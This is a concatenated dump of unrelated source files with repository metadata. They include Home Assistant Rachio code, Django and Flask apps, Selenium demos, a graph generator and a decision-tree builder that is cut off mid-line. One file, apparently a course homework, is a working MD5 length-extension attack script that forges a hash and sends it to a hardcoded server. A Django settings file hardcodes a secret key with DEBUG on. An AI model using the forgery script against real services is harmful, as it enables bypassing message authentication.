ax.semilogy(thetas, G_l_t_dt[22,:], label = r'$\ell$ = %1.2f nm' %ls6)
ax.semilogy(thetas, G_l_t_dt[32,:], label = r'$\ell$ = %1.2f nm' %ls1)
ax.semilogy(thetas, G_l_t_dt[42,:], label = r'$\ell$ = %1.2f nm' %ls2)
ax.semilogy(thetas, G_l_t_dt[52,:], label = r'$\ell$ = %1.2f nm' %ls3)
#ax.semilogy(0,0,'', label = r'$G_\theta = cos(2\theta)/2sin(\theta)$')
pl.xlabel(r'$Angle\,\,\mathrm{[radians]}$', size = 20)
pl.ylabel(r'$-G(\ell,\theta)\,\,\mathrm{[k_{B}T]}$', size = 20)
pl.axis([0,1.7,1e-10,1.0])
#pl.axis([0,1.7,1e-3,1e4])
#pl.title(r'$\mathrm{-G(\ell,\theta)\,vs.\,angle:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'lower left')
#pl.savefig('plots/skew_ret_water/skew_ret_water_G_vs_theta.pdf')
#show()
pl.savefig('plots/skew_ret_water/G_vs_theta_fixed_l.pdf')
show()
pl.figure()
pl.loglog(ls, G_l_t_dt)#, label = labels[i])
#pl.loglog(ls, G_l_t_dt[:,3], label = r'$\theta = \pi/4$')
#pl.loglog(ls, G_l_t_dt[:,4], label = r'$\theta = \pi/3$')
#pl.loglog(ls, G_l_t_dt[:,6], label = r'$\theta = \pi/2$')
pl.xlabel(r'$Separation,\,\ell\,\,\mathrm{[m]}$', size = 20)
pl.ylabel(r'$-G(\ell,\theta)\,\,\mathrm{[k_{B}T]}$', size = 20)
pl.axis([1.0e-9, 1.0e-6,1e-16,1e3])
#pl.axis([1.0e-9, 1.0e-6,1e-3,1e3])
#pl.title(r'$\mathrm{-G(\ell,\theta)\,vs.\,separation:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'best')
pl.savefig('plots/compare/skew_ret_water_G_vs_l.pdf')
show()
| [
"[email protected]"
] | |
37694eb9518f87e68f56b733a3fbd604c4eddd79 | 11ad104b0309a2bffd7537d05e2ab3eaf4aed0ca | /homeassistant/components/rachio/device.py | 9d7c30579394412becf75ff8253ffd54c62cc51b | [
"Apache-2.0"
] | permissive | koying/home-assistant | 15e5d01a45fd4373b3d286e1b2ca5aba1311786d | 9fc92ab04e0d1933cc23e89b4095714aee725f8b | refs/heads/dev | 2023-06-24T01:15:12.150720 | 2020-11-01T12:27:33 | 2020-11-01T12:27:33 | 189,232,923 | 2 | 1 | Apache-2.0 | 2023-01-13T06:04:15 | 2019-05-29T13:39:02 | Python | UTF-8 | Python | false | false | 6,956 | py | """Adapter to wrap the rachiopy api for home assistant."""
import logging
from typing import Optional
from homeassistant.const import EVENT_HOMEASSISTANT_STOP, HTTP_OK
from .const import (
KEY_DEVICES,
KEY_ENABLED,
KEY_EXTERNAL_ID,
KEY_FLEX_SCHEDULES,
KEY_ID,
KEY_MAC_ADDRESS,
KEY_MODEL,
KEY_NAME,
KEY_SCHEDULES,
KEY_SERIAL_NUMBER,
KEY_STATUS,
KEY_USERNAME,
KEY_ZONES,
)
from .webhooks import LISTEN_EVENT_TYPES, WEBHOOK_CONST_ID
_LOGGER = logging.getLogger(__name__)
class RachioPerson:
"""Represent a Rachio user."""
def __init__(self, rachio, config_entry):
"""Create an object from the provided API instance."""
# Use API token to get user ID
self.rachio = rachio
self.config_entry = config_entry
self.username = None
self._id = None
self._controllers = []
def setup(self, hass):
"""Rachio device setup."""
response = self.rachio.person.info()
assert int(response[0][KEY_STATUS]) == HTTP_OK, "API key error"
self._id = response[1][KEY_ID]
# Use user ID to get user data
data = self.rachio.person.get(self._id)
assert int(data[0][KEY_STATUS]) == HTTP_OK, "User ID error"
self.username = data[1][KEY_USERNAME]
devices = data[1][KEY_DEVICES]
for controller in devices:
webhooks = self.rachio.notification.get_device_webhook(controller[KEY_ID])[
1
]
# The API does not provide a way to tell if a controller is shared
# or if they are the owner. To work around this problem we fetch the webooks
# before we setup the device so we can skip it instead of failing.
# webhooks are normally a list, however if there is an error
# rachio hands us back a dict
if isinstance(webhooks, dict):
_LOGGER.error(
"Failed to add rachio controller '%s' because of an error: %s",
controller[KEY_NAME],
webhooks.get("error", "Unknown Error"),
)
continue
rachio_iro = RachioIro(hass, self.rachio, controller, webhooks)
rachio_iro.setup()
self._controllers.append(rachio_iro)
_LOGGER.info('Using Rachio API as user "%s"', self.username)
@property
def user_id(self) -> str:
"""Get the user ID as defined by the Rachio API."""
return self._id
@property
def controllers(self) -> list:
"""Get a list of controllers managed by this account."""
return self._controllers
def start_multiple_zones(self, zones) -> None:
"""Start multiple zones."""
self.rachio.zone.start_multiple(zones)
class RachioIro:
"""Represent a Rachio Iro."""
def __init__(self, hass, rachio, data, webhooks):
"""Initialize a Rachio device."""
self.hass = hass
self.rachio = rachio
self._id = data[KEY_ID]
self.name = data[KEY_NAME]
self.serial_number = data[KEY_SERIAL_NUMBER]
self.mac_address = data[KEY_MAC_ADDRESS]
self.model = data[KEY_MODEL]
self._zones = data[KEY_ZONES]
self._schedules = data[KEY_SCHEDULES]
self._flex_schedules = data[KEY_FLEX_SCHEDULES]
self._init_data = data
self._webhooks = webhooks
_LOGGER.debug('%s has ID "%s"', str(self), self.controller_id)
def setup(self):
"""Rachio Iro setup for webhooks."""
# Listen for all updates
self._init_webhooks()
def _init_webhooks(self) -> None:
"""Start getting updates from the Rachio API."""
current_webhook_id = None
# First delete any old webhooks that may have stuck around
def _deinit_webhooks(_) -> None:
"""Stop getting updates from the Rachio API."""
if not self._webhooks:
# We fetched webhooks when we created the device, however if we call _init_webhooks
# again we need to fetch again
self._webhooks = self.rachio.notification.get_device_webhook(
self.controller_id
)[1]
for webhook in self._webhooks:
if (
webhook[KEY_EXTERNAL_ID].startswith(WEBHOOK_CONST_ID)
or webhook[KEY_ID] == current_webhook_id
):
self.rachio.notification.delete(webhook[KEY_ID])
self._webhooks = None
_deinit_webhooks(None)
# Choose which events to listen for and get their IDs
event_types = []
for event_type in self.rachio.notification.get_webhook_event_type()[1]:
if event_type[KEY_NAME] in LISTEN_EVENT_TYPES:
event_types.append({"id": event_type[KEY_ID]})
# Register to listen to these events from the device
url = self.rachio.webhook_url
auth = WEBHOOK_CONST_ID + self.rachio.webhook_auth
new_webhook = self.rachio.notification.add(
self.controller_id, auth, url, event_types
)
# Save ID for deletion at shutdown
current_webhook_id = new_webhook[1][KEY_ID]
self.hass.bus.listen(EVENT_HOMEASSISTANT_STOP, _deinit_webhooks)
def __str__(self) -> str:
"""Display the controller as a string."""
return f'Rachio controller "{self.name}"'
@property
def controller_id(self) -> str:
"""Return the Rachio API controller ID."""
return self._id
@property
def current_schedule(self) -> str:
"""Return the schedule that the device is running right now."""
return self.rachio.device.current_schedule(self.controller_id)[1]
@property
def init_data(self) -> dict:
"""Return the information used to set up the controller."""
return self._init_data
def list_zones(self, include_disabled=False) -> list:
"""Return a list of the zone dicts connected to the device."""
# All zones
if include_disabled:
return self._zones
# Only enabled zones
return [z for z in self._zones if z[KEY_ENABLED]]
def get_zone(self, zone_id) -> Optional[dict]:
"""Return the zone with the given ID."""
for zone in self.list_zones(include_disabled=True):
if zone[KEY_ID] == zone_id:
return zone
return None
def list_schedules(self) -> list:
"""Return a list of fixed schedules."""
return self._schedules
def list_flex_schedules(self) -> list:
"""Return a list of flex schedules."""
return self._flex_schedules
def stop_watering(self) -> None:
"""Stop watering all zones connected to this controller."""
self.rachio.device.stop_water(self.controller_id)
_LOGGER.info("Stopped watering of all zones on %s", str(self))
| [
"[email protected]"
] | |
5d2200a128aabb70c081dea75e660bd7b9a29f3e | b93c90054ede72fb706567e2b60a5e4bba5485d3 | /cru/__init__.py | 3f204900689b0e4ad473586a2413b190d0343060 | [] | no_license | guziy/ShortPythonScripts | 2568b92124003fa4b0c673c3ce872df623dff76c | 17b1ed47231aa566c8af04e19cced49a795b37d8 | refs/heads/master | 2016-09-06T01:30:30.365172 | 2014-07-18T15:52:25 | 2014-07-18T15:52:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | __author__ = 'huziy'
import numpy as np
def main():
#TODO: implement
pass
if __name__ == "__main__":
main()
print "Hello world"
| [
"[email protected]"
] | |
b1067dbd1da869a3839d1527813c511360fafa32 | 17a7e1941d1f0e9e2747ce177344cf081aeb1aa0 | /examples/sbm_arxiv_paper.py | 21987364c3ea82ea603bf54540f87aceb88df3be | [] | no_license | abdcelikkanat/rangraphgen | 413871bd757992c8c87f520c7fecbd18bc004eed | 491a94ddd0d8682ae3e6a30921e9de73327acea8 | refs/heads/master | 2020-03-21T08:09:34.540550 | 2018-07-23T16:13:55 | 2018-07-23T16:13:55 | 138,324,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,086 | py | from sbm.sbm import SBM
"""
model = {}
model['sbm_N'] = 100 # the number of nodes
model['sbm_P'] = [[0.6, 0.2], [0.2, 0.8]] # edge probability matrix between nodes belonging different communities
model['sbm_block_sizes'] = [40, 60]
output_file = "../outputs/synthetic_"
output_file += "n{}_p{}_sizes{}.gml".format(model['sbm_N'], 1, ":".join(str(v) for v in model['sbm_block_sizes']))
sbm = SBM(model=model)
sbm.build_graph()
g = sbm.get_graph()
sbm.save_graph(output_file)
#sbm.plot_graph()
"""
model = {}
N = 10000
c = 3.5
model['sbm_block_sizes'] = [N/2, N/2]
K = 2
mylambda = 0.9
model['sbm_N'] = N
model['sbm_P'] = [[0.0 for _ in range(K)] for _ in range(K)]
for i in range(K):
for j in range(K):
if i == j:
model['sbm_P'][i][j] = float(c) / float(N)
else:
model['sbm_P'][i][j] = float(c)*(1.0 - mylambda) / float(N)
output_file = "../outputs/sbm_"
output_file += "n{}_k{}_lambda{}_c{}.gml".format(N, K, mylambda, c)
sbm = SBM(model=model)
sbm.build_graph()
g = sbm.get_graph()
sbm.save_graph(output_file)
#sbm.plot_graph() | [
"[email protected]"
] | |
39cc3029c96a86e815190984cebf90bce285fb25 | 7450483dd16f7dea4bef09a5166a67c7527b7ca2 | /hw_8_stub.py | faed32fa97ff75a4f1b0a0c90f450a885d815fca | [] | no_license | rmvook/HW8_CMSC389R | 604ec50cc225926e53692fc0ebcf366dc4914a98 | 03fad8af81e2e985d121d9fbdb2d0ed939534a81 | refs/heads/master | 2020-03-09T15:45:17.796936 | 2018-04-16T15:11:50 | 2018-04-16T15:11:50 | 128,867,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,824 | py | # do `curl http://starship.python.net/~gherman/programs/md5py/md5py.py > md5.py`
# if you do not have it from the git repo
import md5py, socket, hashlib, string, sys, os, time
f = open("output.txt", "w")
host = "159.89.236.106" # IP address or URL
port = 5678 # port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
data = s.recv(1024)
print(data)
#####################################
### STEP 1: Calculate forged hash ###
#####################################
one = "1\n"
s.send(one)
data = s.recv(1024)
print(data)
message = 'blahah' # original message here
s.send(message + "\n")
data = s.recv(1024)
print(data)
temp = data[40:]
legit = temp.strip()
print(legit)
f.write("Hash from which I based my crafted hash: " + legit + "\n")
# a legit hash of secret + message goes here, obtained from signing a message
# initialize hash object with state of a vulnerable hash
fake_hash = md5py.new('A' * 64)
fake_hash.A, fake_hash.B, fake_hash.C, fake_hash.D = md5py._bytelist2long(legit.decode('hex'))
malicious = 'bluhuh' # put your malicious message here
# update legit hash with malicious message
fake_hash.update(malicious)
# test is the correct hash for md5(secret + message + padding + malicious)
test = fake_hash.hexdigest()
print("Testing fake" + test)
f.write("Fake hash" + test + "\n")
#############################
### STEP 2: Craft payload ###
#############################
# TODO: calculate proper padding based on secret + message
# secret is 6 bytes long (48 bits)
# each block in MD5 is 512 bits long
# secret + message is followed by bit 1 then bit 0's (i.e. \x80\x00\x00...)
# after the 0's is a bye with message length in bits, little endian style
# (i.e. 20 char msg = 160 bits = 0xa0 = '\xa0\x00\x00\x00\x00\x00\x00\x00\x00')
# craft padding to align the block as MD5 would do it
# (i.e. len(secret + message + padding) = 64 bytes = 512 bits
nulls = "\x00" * 43
end = "\x00" * 7
padding = "\x80" + nulls + "\x60" + end
# payload is the message that corresponds to the hash in `test`
# server will calculate md5(secret + payload)
# = md5(secret + message + padding + malicious)
# = test
payload = message + padding + malicious
print("PAYLOAD: " + payload)
# send `test` and `payload` to server (manually or with sockets)
# REMEMBER: every time you sign new data, you will regenerate a new secret!
f.write("PAYLOAD: " + payload + "\n")
two = "2\n"
s.send(two) #telling the server that I want to verify a hash.
data = s.recv(1024)
print(data)
s.send(test + "\n")
data = s.recv(1024)
print(data)
s.send(payload + "\n")
data = s.recv(1024) # was not receiving everything, so did it twice.
print(data)
data = s.recv(1024)
print(data)
s.close()# close the connection
f.close()#close the file | [
"[email protected]"
] | |
bd3d8511ec40499ea66fcc1e2c71b26b17f8565d | cd79b7919fd0984c12e8acde8abda4290fd65b0f | /draftcast/settings.py | dbaf6a6cc14ebfb87a7c0db296138f30760cc41a | [] | no_license | rallen0150/nfl_draftcast | 7d5d84352986349f0646a9199d3aa3b29bfac4a2 | 3f5f9980902ee73fbca3c5b3db4545179ff5208a | refs/heads/master | 2021-01-20T04:43:00.356120 | 2017-04-29T14:45:16 | 2017-04-29T14:45:16 | 89,718,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,349 | py | """
Django settings for draftcast project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'xkaaf7fhx_nv$1(!enr!opy*x47n85mi^3!hapv_#dapytq$ls'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['quiet-garden-99226.herokuapp.com', 'localhost']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'draftcast.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'draftcast.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
import dj_database_url
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
database_config = dj_database_url.config()
if database_config:
DATABASES['default'] = database_config
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"[email protected]"
] | |
fed1af0912a71ebae30785c3e9dcaec26f4337f6 | d29c1c1901b8f5aac07ea67c969f4e96e3642376 | /venv/Scripts/pip-script.py | 670e74ae05294d33a619274f5839d91a361a2800 | [] | no_license | aljaserm/pdf | 10f0f97572fb2021604e70aeb3ed2f8920668a12 | 4648703819260380ebc942bba31817e47821f23f | refs/heads/master | 2020-08-29T20:41:32.846815 | 2019-12-12T00:03:21 | 2019-12-12T00:03:21 | 218,169,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | #!C:\Users\aljas\OneDrive\Documents\Development\Python\pdf\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
| [
"[email protected]"
] | |
aa6145e09b71b6311ef725f088a53c2d8f67c1e5 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_hacking.py | 5138e808004dfe243f61edf4bc4bd5dbb450c3c0 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py |
#calss header
class _HACKING():
def __init__(self,):
self.name = "HACKING"
self.definitions = hack
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['hack']
| [
"[email protected]"
] | |
f378db34785d00813c8dcfbbeaac5e36f4951d2b | ec0b8bfe19b03e9c3bb13d9cfa9bd328fb9ca3f1 | /res/packages/scripts/scripts/client/gui/prb_control/entities/battle_session/__init__.py | a41701b1d0acaedce8b7e47eb63a44121abed16e | [] | no_license | webiumsk/WOT-0.9.20.0 | de3d7441c5d442f085c47a89fa58a83f1cd783f2 | 811cb4e1bca271372a1d837a268b6e0e915368bc | refs/heads/master | 2021-01-20T22:11:45.505844 | 2017-08-29T20:11:38 | 2017-08-29T20:11:38 | 101,803,045 | 0 | 1 | null | null | null | null | WINDOWS-1250 | Python | false | false | 401 | py | # 2017.08.29 21:45:30 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/prb_control/entities/battle_session/__init__.py
pass
# okay decompyling c:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\prb_control\entities\battle_session\__init__.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.08.29 21:45:30 Střední Evropa (letní čas)
| [
"[email protected]"
] | |
5c7e781861cf2f6c726c08b123b74dd794c2056e | 5fa91971a552de35422698ad3e371392fd5eb48a | /docs/webflask/todo/todo_z4.py | 7b5d27384609f0e5dd9f8849bc294038bdc06384 | [
"MIT",
"CC-BY-SA-4.0"
] | permissive | koduj-z-klasa/python101 | 64b0bf24da6c7fc29c0d3c5a74ce7975d648b760 | accfca2a8a0f2b9eba884bffe31be6d1e73fb615 | refs/heads/master | 2022-06-06T09:29:01.688553 | 2022-05-22T19:50:09 | 2022-05-22T19:50:09 | 23,770,911 | 45 | 182 | MIT | 2022-03-31T10:40:13 | 2014-09-07T21:01:09 | Python | UTF-8 | Python | false | false | 1,835 | py | # -*- coding: utf-8 -*-
# todo/todo.py
from flask import Flask, g
from flask import render_template
import os
import sqlite3
from datetime import datetime
from flask import flash, redirect, url_for, request
app = Flask(__name__)
app.config.update(dict(
SECRET_KEY='bardzosekretnawartosc',
DATABASE=os.path.join(app.root_path, 'db.sqlite'),
SITE_NAME='Moje zadania'
))
def get_db():
"""Funkcja tworząca połączenie z bazą danych"""
if not g.get('db'): # jeżeli brak połączenia, to je tworzymy
con = sqlite3.connect(app.config['DATABASE'])
con.row_factory = sqlite3.Row
g.db = con # zapisujemy połączenie w kontekście aplikacji
return g.db # zwracamy połączenie z bazą
@app.teardown_appcontext
def close_db(error):
"""Zamykanie połączenia z bazą"""
if g.get('db'):
g.db.close()
@app.route('/')
def index():
# return 'Cześć, tu Python!'
return render_template('index.html')
@app.route('/zadania', methods=['GET', 'POST'])
def zadania():
error = None
if request.method == 'POST':
zadanie = request.form['zadanie'].strip()
if len(zadanie) > 0:
zrobione = '0'
data_pub = datetime.now()
db = get_db()
db.execute('INSERT INTO zadania VALUES (?, ?, ?, ?);',
[None, zadanie, zrobione, data_pub])
db.commit()
flash('Dodano nowe zadanie.')
return redirect(url_for('zadania'))
error = 'Nie możesz dodać pustego zadania!' # komunikat o błędzie
db = get_db()
kursor = db.execute('SELECT * FROM zadania ORDER BY data_pub DESC;')
zadania = kursor.fetchall()
return render_template('zadania_lista.html', zadania=zadania, error=error)
if __name__ == '__main__':
app.run(debug=True)
| [
"[email protected]"
] | |
74305ab38ac0340b375cb8afb1b90ea07fd23e36 | bf24b73282ae80b7ff813f2d794bdace9421b017 | /carapace/carapace/doctype/rejection_gate_entry_items/rejection_gate_entry_items.py | b3a21751d4d81fda563dfdc4c1c7c58850e5338e | [
"MIT"
] | permissive | hrgadeha/carapace | 8d78cc8d45c1de0293204dfbd47802e1eebf87ee | 3c001422c6b05644a52f6250c55526b23cbd4320 | refs/heads/master | 2022-01-20T11:37:26.765923 | 2022-01-09T09:38:57 | 2022-01-09T09:38:57 | 163,376,460 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, frappe and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class RejectionGateEntryitems(Document):
pass
| [
"[email protected]"
] | |
8cbc7c2bbd2aaea3b6bd0378c72ca37769c8035d | 955b968d46b4c436be55daf8aa1b8fc8fe402610 | /ch04/baidu_screenshot.py | c3aca7449f0e884890aadc2bfc8ba7f2977f6243 | [] | no_license | han-huang/python_selenium | 1c8159fd1421b1f0e87cb0df20ae4fe82450f879 | 56f9f5e5687cf533c678a1c12e1ecaa4c50a7795 | refs/heads/master | 2020-03-09T02:24:48.882279 | 2018-04-07T15:06:18 | 2018-04-07T15:06:18 | 128,535,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from time import sleep, ctime
from selenium import webdriver
import os
driver = webdriver.Firefox()
# driver = webdriver.Chrome()
driver.get("http://www.baidu.com")
# http://selenium-python.readthedocs.io/api.html?highlight=get_screenshot_as_file#selenium.webdriver.remote.webdriver.WebDriver.get_screenshot_as_file
# get_screenshot_as_file(filename)
# Saves a screenshot of the current window to a PNG image file. Returns
# False if there is any IOError, else returns True. Use full paths in your filename.
# Args:
# filename: The full path you wish to save your screenshot to. This should end with a .png extension.
# Usage:
# driver.get_screenshot_as_file(‘/Screenshots/foo.png’)
save = os.getcwd() + '\\' + os.path.splitext(__file__)[0] + ".png"
try:
driver.find_element_by_id('kw_error').send_key('selenium')
driver.find_element_by_id('su').click()
except:
driver.get_screenshot_as_file(save)
# driver.quit()
| [
"vagrant@LaravelDemoSite"
] | vagrant@LaravelDemoSite |
ca84176dcc4543867190893bc2a6e3aca04b239d | 107941a50c3adc621563fe0254fd407ea38d752e | /spider_01.py | 32d42c2a2ca6ef3b58162d8cb4c81ff8efba1721 | [] | no_license | zhangliang852469/spider_ | 758a4820f8bd25ef6ad0edbd5a4efbaaa410ae08 | 718208c4d8e6752bbe8d66a209e6d7446c81d139 | refs/heads/master | 2020-04-05T07:12:03.790358 | 2018-11-08T07:17:22 | 2018-11-08T07:17:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,409 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
""" 查找节点 例:淘宝"""
"""
find_element_by_id
find_element_by_name
find_element_by_xpath
find_element_by_link_text
find_element_by_partial_link_text
find_element_by_tag_name
find_element_by_class_name
find_element_by_css_selector
"""
from selenium import webdriver
# 首先初始化启动浏览器
browser = webdriver.Chrome()
# 打开网页
browser.get('https://www.taobao.com')
# 查找节点可以通过ID, css selector, xpath, name来查找
input_first = browser.find_element_by_id('q')
input_second = browser.find_element_by_css_selector('#q')
input_third = browser.find_element_by_xpath('//*[@id="q"]')
input_fouth = browser.find_element_by_name('q')
# 输出查找
print(input_first, '\n', input_second,'\n', input_third,'\n', input_fouth)
browser.close()
# Selenium 还提供了通用的 find_element() 方法,它需要传入两个参数,一个是查找的方式
# By,另一个就是值,实际上它就是 find_element_by_id() 这种方法的通用函数版本
# 比如 find_element_by_id(id) 就等价于 find_element(By.ID, id),二者得到的结果完全一致。
# from selenium import webdriver
# from selenium.webdriver.common.by import By
#
# browser = webdriver.Chrome()
# browser.get('https://www.taobao.com')
# input_first = browser.find_element(By.ID, 'q')
# print(input_first)
# browser.close()
| [
"[email protected]"
] | |
2d6e5f19e61795d94a3b817b0a1f16c5256a54de | f2da63de512183804290bfcabfa60eaca3649e05 | /projects/StatCan/non-probability/handcraftsman/chap03/code/dtree.py | 0f015898b2acb2e4ed655a7df2ecca353250e4b5 | [] | no_license | paradisepilot/statistics | a94bb57ebe453d49c06815c523e8f633423cb68e | 50daf644baca1f40253edf91083ed42d4c5f9342 | refs/heads/master | 2022-07-25T16:19:07.751886 | 2022-06-26T21:18:38 | 2022-06-26T21:18:38 | 5,012,656 | 0 | 2 | null | 2019-04-22T06:52:55 | 2012-07-13T01:11:42 | HTML | UTF-8 | Python | false | false | 9,345 | py | # File: dtree.py
# from chapter 3 of _Tree-based Machine Learning Algorithms_
#
# Author: Clinton Sheppard <[email protected]>
# Copyright (c) 2017 Clinton Sheppard
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
from numbers import Number
import operator
import math
def build(data, outcomeLabel, continuousAttributes=None):
attrIndexes = [index for index, label in enumerate(data[0]) if label != outcomeLabel]
print( "attrIndexes: " + str(attrIndexes) )
outcomeIndex = data[0].index(outcomeLabel)
print( "outcomeIndex: " + str(outcomeIndex) )
continuousAttrIndexes = set()
if continuousAttributes is not None:
continuousAttrIndexes = {data[0].index(label) for label in continuousAttributes}
if len(continuousAttrIndexes) != len(continuousAttributes):
raise Exception('One or more continuous column names are duplicates.')
else:
for attrIndex in attrIndexes:
uniqueValues = {row[attrIndex] for rowIndex, row in enumerate(data) if rowIndex > 0}
numericValues = {value for value in uniqueValues if isinstance(value, Number)}
if len(uniqueValues) == len(numericValues):
continuousAttrIndexes.add(attrIndex)
print( "continuousAttrIndexes: " + str(continuousAttrIndexes) )
nodes = []
lastNodeNumber = 0
workQueue = [ (-1, lastNodeNumber, set(i for i in range(1, len(data)))) ]
while len(workQueue) > 0:
print( "~~~~~~~~~~" )
parentNodeId, nodeId, dataRowIndexes = workQueue.pop()
print(
"parentNodeId: " + str(parentNodeId) + ", " +
"nodeId: " + str(nodeId) + ", " +
"dataRowIndexes: " + str(dataRowIndexes)
)
uniqueOutcomes = set(data[i][outcomeIndex] for i in dataRowIndexes)
if len(uniqueOutcomes) == 1:
nodes.append((nodeId, uniqueOutcomes.pop()))
continue
potentials = _get_potentials(
attrIndexes = attrIndexes,
continuousAttrIndexes = continuousAttrIndexes,
data = data,
dataRowIndexes = dataRowIndexes,
outcomeIndex = outcomeIndex
)
attrIndex, attrValue, isMatch = potentials[0][1:]
print(
"attrIndex: " + str(attrIndex) + ", " +
"attrValue: " + str(attrValue) + ", " +
"isMatch: " + str(isMatch)
)
matches = {
rowIndex for rowIndex in dataRowIndexes
if isMatch(data[rowIndex][attrIndex],attrValue)
}
nonMatches = dataRowIndexes - matches
lastNodeNumber += 1
matchId = lastNodeNumber
workQueue.append((nodeId, matchId, matches))
print( " match: " + str( (nodeId, matchId, matches) ) )
lastNodeNumber += 1
nonMatchId = lastNodeNumber
workQueue.append((nodeId, nonMatchId, nonMatches))
print( "non-match: " + str( (nodeId, nonMatchId, nonMatches) ) )
nodes.append(
(nodeId, attrIndex, attrValue, isMatch, matchId, nonMatchId, len(matches), len(nonMatches))
)
print( "~~~~~~~~~~" )
nodes = sorted(nodes, key = lambda n: n[0])
return DTree(nodes, data[0])
def _get_potentials(
attrIndexes,
continuousAttrIndexes,
data,
dataRowIndexes,
outcomeIndex
):
uniqueAttributeValuePairs = {
(attrIndex, data[rowIndex][attrIndex], operator.eq)
for attrIndex in attrIndexes
if attrIndex not in continuousAttrIndexes
for rowIndex in dataRowIndexes
}
print( "uniqueAttributeValuePairs: " + str(uniqueAttributeValuePairs) )
print( "len(uniqueAttributeValuePairs) = " + str(len(uniqueAttributeValuePairs)) )
print()
continuousAttributeValuePairs = _get_continuous_av_pairs(
continuousAttrIndexes,
data,
dataRowIndexes
)
print( "continuousAttributeValuePairs: " + str(continuousAttributeValuePairs) )
print( "len(continuousAttributeValuePairs) = " + str(len(continuousAttributeValuePairs)) )
print()
uniqueAttributeValuePairs |= continuousAttributeValuePairs
print( "uniqueAttributeValuePairs: " + str(uniqueAttributeValuePairs) )
print( "len(uniqueAttributeValuePairs) = " + str(len(uniqueAttributeValuePairs)) )
print()
potentials = sorted(
